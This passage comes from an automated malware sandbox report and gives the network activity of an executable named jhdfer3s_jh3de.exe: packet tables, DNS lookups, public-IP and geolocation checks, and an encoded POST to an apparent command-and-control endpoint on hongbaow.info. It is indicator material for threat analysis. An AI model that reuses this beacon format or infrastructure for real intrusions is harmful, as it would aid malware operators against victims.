                                      Jan 22, 2025 08:44:25.081752062 CET44356222104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:25.081840038 CET56222443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:25.082227945 CET56222443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:25.082263947 CET44356222104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:25.327291012 CET44356221104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:25.327471018 CET56221443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:25.327491999 CET44356221104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:25.327510118 CET56221443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:25.327532053 CET44356221104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:25.327541113 CET56221443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:25.327600002 CET56221443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:25.533387899 CET44356222104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:25.533535004 CET56222443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:25.534034967 CET56222443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:25.534063101 CET44356222104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:25.534210920 CET56222443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:25.534223080 CET44356222104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:25.871198893 CET44356222104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:25.871270895 CET56222443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:25.871350050 CET44356222104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:25.871388912 CET44356222104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:25.871462107 CET56222443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:25.871525049 CET56222443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:25.871556997 CET44356222104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:28.893933058 CET56223443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:28.893985033 CET44356223104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:28.894367933 CET56223443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:28.894664049 CET56223443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:28.894697905 CET44356223104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:29.386243105 CET44356223104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:29.389395952 CET56223443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:29.390042067 CET56223443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:29.390098095 CET44356223104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:29.390175104 CET56223443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:29.390189886 CET44356223104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:29.721225023 CET44356223104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:29.721399069 CET44356223104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:29.721451044 CET56223443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:29.721483946 CET56223443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:29.725219011 CET56223443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:29.725285053 CET44356223104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:30.331751108 CET56224443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:30.331845999 CET44356224104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:30.331927061 CET56224443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:30.332288027 CET56224443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:30.332326889 CET44356224104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:30.788527966 CET44356224104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:30.791563988 CET56224443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:30.793116093 CET56224443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:30.793179035 CET44356224104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:30.793240070 CET56224443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:30.793256998 CET44356224104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:31.121490955 CET44356224104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:31.121642113 CET44356224104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:31.121915102 CET56224443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:31.121915102 CET56224443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:31.121915102 CET56224443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:32.737993002 CET56225443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:32.738037109 CET44356225104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:32.738115072 CET56225443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:32.738627911 CET56225443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:32.738645077 CET44356225104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:33.197989941 CET44356225104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:33.199129105 CET56225443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:33.199811935 CET56225443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:33.199825048 CET44356225104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:33.200028896 CET56225443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:33.200036049 CET44356225104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:33.537760973 CET44356225104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:33.537931919 CET44356225104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:33.538048983 CET56225443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:33.541235924 CET56225443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:33.541255951 CET44356225104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:36.175184011 CET56226443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:36.175276995 CET44356226104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:36.175375938 CET56226443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:36.175828934 CET56226443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:36.175906897 CET44356226104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:36.550028086 CET56227443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:36.550065994 CET44356227104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:36.550137043 CET56227443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:36.550431013 CET56227443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:36.550440073 CET44356227104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:36.631481886 CET44356226104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:36.631675959 CET56226443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:36.632067919 CET56226443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:36.632096052 CET44356226104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:36.632391930 CET56226443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:36.632447958 CET44356226104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:36.976037979 CET44356226104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:36.976125002 CET44356226104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:36.976263046 CET56226443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:36.976263046 CET56226443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:36.981826067 CET56226443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:36.981826067 CET56226443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:36.981897116 CET44356226104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:36.981977940 CET56226443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:37.011192083 CET44356227104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:37.011249065 CET56227443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:37.011778116 CET56227443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:37.011786938 CET44356227104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:37.039431095 CET56227443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:37.039438009 CET44356227104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:37.329411030 CET44356227104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:37.329567909 CET44356227104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:37.329765081 CET56227443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:37.329880953 CET56227443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:37.329895020 CET44356227104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:40.331365108 CET56228443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:40.331412077 CET44356228104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:40.331478119 CET56228443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:40.331770897 CET56228443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:40.331780910 CET44356228104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:40.791027069 CET44356228104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:40.791207075 CET56228443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:40.791646957 CET56228443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:40.791655064 CET44356228104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:40.791825056 CET56228443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:40.791830063 CET44356228104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:41.391067982 CET44356228104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:41.391150951 CET56228443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:41.391185999 CET44356228104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:41.391235113 CET44356228104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:41.391242981 CET56228443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:41.391285896 CET56228443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:41.391459942 CET56228443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:41.391477108 CET44356228104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:41.988523006 CET56229443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:41.988614082 CET44356229104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:41.988718033 CET56229443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:41.989351988 CET56229443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:41.989392042 CET44356229104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:42.450151920 CET44356229104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:42.450376034 CET56229443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:42.450937033 CET56229443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:42.450998068 CET44356229104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:42.451056004 CET56229443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:42.451071024 CET44356229104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:42.770662069 CET44356229104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:42.770824909 CET44356229104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:42.770901918 CET56229443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:42.770903111 CET56229443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:42.770994902 CET56229443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:42.771039963 CET44356229104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:42.771070957 CET56229443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:42.771109104 CET56229443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:44.402195930 CET56230443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:44.402247906 CET44356230104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:44.402306080 CET56230443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:44.402837038 CET56230443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:44.402851105 CET44356230104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:45.072132111 CET44356230104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:45.072192907 CET56230443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:45.072766066 CET56230443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:45.072772026 CET44356230104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:45.072949886 CET56230443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:45.072953939 CET44356230104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:45.411309004 CET44356230104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:45.411506891 CET44356230104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:45.411607027 CET56230443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:45.411793947 CET56230443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:45.411812067 CET44356230104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:47.784629107 CET56231443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:47.784728050 CET44356231104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:47.785049915 CET56231443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:47.785491943 CET56231443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:47.785574913 CET44356231104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:48.413911104 CET44356231104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:48.415401936 CET56231443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:48.416021109 CET56231443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:48.416074991 CET44356231104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:48.416207075 CET56231443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:48.416223049 CET44356231104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:48.425235987 CET56232443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:48.425323963 CET44356232104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:48.426166058 CET56232443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:48.426316023 CET56232443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:48.426347971 CET44356232104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:48.814923048 CET44356231104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:48.815078974 CET44356231104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:48.815114975 CET56231443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:48.815185070 CET56231443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:48.815237999 CET56231443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:48.815282106 CET44356231104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:48.815357924 CET56231443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:48.815357924 CET56231443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:48.885392904 CET44356232104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:48.885755062 CET56232443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:48.886096001 CET56232443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:48.886133909 CET44356232104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:48.886451006 CET56232443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:48.886503935 CET44356232104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:49.224574089 CET44356232104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:49.224739075 CET44356232104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:49.224833965 CET56232443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:49.224905014 CET56232443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:49.225208998 CET56232443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:49.225271940 CET44356232104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:52.253180027 CET56233443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:52.253237009 CET44356233104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:52.253400087 CET56233443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:52.254054070 CET56233443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:52.254070044 CET44356233104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:52.730882883 CET44356233104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:52.730957031 CET56233443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:52.731576920 CET56233443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:52.731638908 CET44356233104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:52.731693029 CET56233443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:52.731705904 CET44356233104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:53.073785067 CET44356233104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:53.073956966 CET44356233104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:53.074086905 CET56233443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:53.649884939 CET56233443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:53.649959087 CET44356233104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:53.831427097 CET56234443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:53.831518888 CET44356234104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:53.831779003 CET56234443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:53.831909895 CET56234443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:53.831931114 CET44356234104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:54.314249039 CET44356234104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:54.314434052 CET56234443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:54.314933062 CET56234443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:54.314985037 CET44356234104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:54.315160990 CET56234443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:54.315176964 CET44356234104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:54.929816008 CET44356234104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:54.929958105 CET44356234104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:54.929991007 CET56234443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:54.930062056 CET56234443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:54.930453062 CET56234443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:54.930454016 CET56234443192.168.2.4104.21.48.1
                                      Jan 22, 2025 08:44:54.930519104 CET44356234104.21.48.1192.168.2.4
                                      Jan 22, 2025 08:44:54.930577993 CET56234443192.168.2.4104.21.48.1

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Jan 22, 2025 08:41:50.492850065 CET4975753192.168.2.41.1.1.1
                                      Jan 22, 2025 08:41:50.500309944 CET53497571.1.1.1192.168.2.4
                                      Jan 22, 2025 08:41:51.191873074 CET5691553192.168.2.41.1.1.1
                                      Jan 22, 2025 08:41:51.201056957 CET53569151.1.1.1192.168.2.4
                                      Jan 22, 2025 08:41:51.887875080 CET5278153192.168.2.41.1.1.1
                                      Jan 22, 2025 08:41:51.913805008 CET53527811.1.1.1192.168.2.4
                                      Jan 22, 2025 08:42:08.915065050 CET53524441.1.1.1192.168.2.4

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Jan 22, 2025 08:41:50.492850065 CET192.168.2.41.1.1.10x3513Standard query (0)myexternalip.comA (IP address)IN (0x0001)false
                                      Jan 22, 2025 08:41:51.191873074 CET192.168.2.41.1.1.10xa535Standard query (0)api.iplocation.netA (IP address)IN (0x0001)false
                                      Jan 22, 2025 08:41:51.887875080 CET192.168.2.41.1.1.10x3c83Standard query (0)hongbaow.infoA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Jan 22, 2025 08:41:50.500309944 CET1.1.1.1192.168.2.40x3513No error (0)myexternalip.com34.160.111.145A (IP address)IN (0x0001)false
                                      Jan 22, 2025 08:41:51.201056957 CET1.1.1.1192.168.2.40xa535No error (0)api.iplocation.net104.26.7.214A (IP address)IN (0x0001)false
                                      Jan 22, 2025 08:41:51.201056957 CET1.1.1.1192.168.2.40xa535No error (0)api.iplocation.net172.67.68.240A (IP address)IN (0x0001)false
                                      Jan 22, 2025 08:41:51.201056957 CET1.1.1.1192.168.2.40xa535No error (0)api.iplocation.net104.26.6.214A (IP address)IN (0x0001)false
                                      Jan 22, 2025 08:41:51.913805008 CET1.1.1.1192.168.2.40x3c83No error (0)hongbaow.info104.21.48.1A (IP address)IN (0x0001)false
                                      Jan 22, 2025 08:41:51.913805008 CET1.1.1.1192.168.2.40x3c83No error (0)hongbaow.info104.21.112.1A (IP address)IN (0x0001)false
                                      Jan 22, 2025 08:41:51.913805008 CET1.1.1.1192.168.2.40x3c83No error (0)hongbaow.info104.21.64.1A (IP address)IN (0x0001)false
                                      Jan 22, 2025 08:41:51.913805008 CET1.1.1.1192.168.2.40x3c83No error (0)hongbaow.info104.21.16.1A (IP address)IN (0x0001)false
                                      Jan 22, 2025 08:41:51.913805008 CET1.1.1.1192.168.2.40x3c83No error (0)hongbaow.info104.21.80.1A (IP address)IN (0x0001)false
                                      Jan 22, 2025 08:41:51.913805008 CET1.1.1.1192.168.2.40x3c83No error (0)hongbaow.info104.21.96.1A (IP address)IN (0x0001)false
                                      Jan 22, 2025 08:41:51.913805008 CET1.1.1.1192.168.2.40x3c83No error (0)hongbaow.info104.21.32.1A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • myexternalip.com
                                      • api.iplocation.net
                                      • hongbaow.info

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.44973134.160.111.1454436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:41:51 UTC70OUTGET /raw HTTP/1.1
                                      User-Agent: Mozilla/5.0
                                      Host: myexternalip.com
                                      2025-01-22 07:41:51 UTC242INHTTP/1.1 200 OK
                                      date: Wed, 22 Jan 2025 07:41:51 GMT
                                      content-type: text/plain; charset=utf-8
                                      Content-Length: 12
                                      access-control-allow-origin: *
                                      via: 1.1 google
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close
                                      2025-01-22 07:41:51 UTC12INData Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                      Data Ascii: 8.46.123.189


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.449732104.26.7.2144436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:41:51 UTC100OUTGET /?cmd=ip-country&ip=8.46.123.189 HTTP/1.1
                                      User-Agent: Mozilla/5.0
                                      Host: api.iplocation.net
                                      2025-01-22 07:41:51 UTC1063INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:41:51 GMT
                                      Content-Type: application/json; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.19
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Access-Control-Allow-Origin: *
                                      Set-Cookie: PHPSESSID=spfko30r6pfhvfm3gb8vd7qejr; expires=Wed, 22-Jan-2025 09:36:32 GMT; Max-Age=7200; path=/; HttpOnly
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o8I2jjhg%2FIXnvrEGGvmmOT9ueIydoqGvQnyUFVFl5zldHq%2Fj12qqjXoXWU1ey4enTvhAArqT%2BRUbmwcc1gBUKgw18WpV5d8sNfQSCSXf9P3yObyXi2uDcaDgZ9BPRo%2Fcf8%2BMLw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de76e5a6d0f81-EWR
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1458&min_rtt=1452&rtt_var=557&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2833&recv_bytes=738&delivery_rate=1942781&cwnd=235&unsent_bytes=0&cid=7b11ee9a972b9526&ts=219&x=0"
                                      2025-01-22 07:41:51 UTC214INData Raw: 64 30 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 69 70 5f 6e 75 6d 62 65 72 22 3a 22 31 33 37 32 36 34 30 36 31 22 2c 22 69 70 5f 76 65 72 73 69 6f 6e 22 3a 34 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 20 6f 66 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 32 22 3a 22 55 53 22 2c 22 69 73 70 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 20 4c 4c 43 22 2c 22 72 65 73 70 6f 6e 73 65 5f 63 6f 64 65 22 3a 22 32 30 30 22 2c 22 72 65 73 70 6f 6e 73 65 5f 6d 65 73 73 61 67 65 22 3a 22 4f 4b 22 7d 0d 0a
                                      Data Ascii: d0{"ip":"8.46.123.189","ip_number":"137264061","ip_version":4,"country_name":"United States of America","country_code2":"US","isp":"CenturyLink Communications LLC","response_code":"200","response_message":"OK"}
                                      2025-01-22 07:41:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.449733104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:41:52 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:41:52 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:41:52 UTC807INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:41:52 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cUP%2FoGk7%2FuSYU3JLvw4MydtiitlkTdNqm4jlpCUTFcl9QbLUChm4RjK9VtuGd%2FWNGJmM1wWvLPDMLxhyreh4RhdBODIw0181ygPPcrvTPZHNJ6dWjMO1hg0GMeRRIeOu"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de772f845c470-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1482&rtt_var=558&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1958417&cwnd=219&unsent_bytes=0&cid=cc8f45a001a2856d&ts=338&x=0"
                                      2025-01-22 07:41:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.449734104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
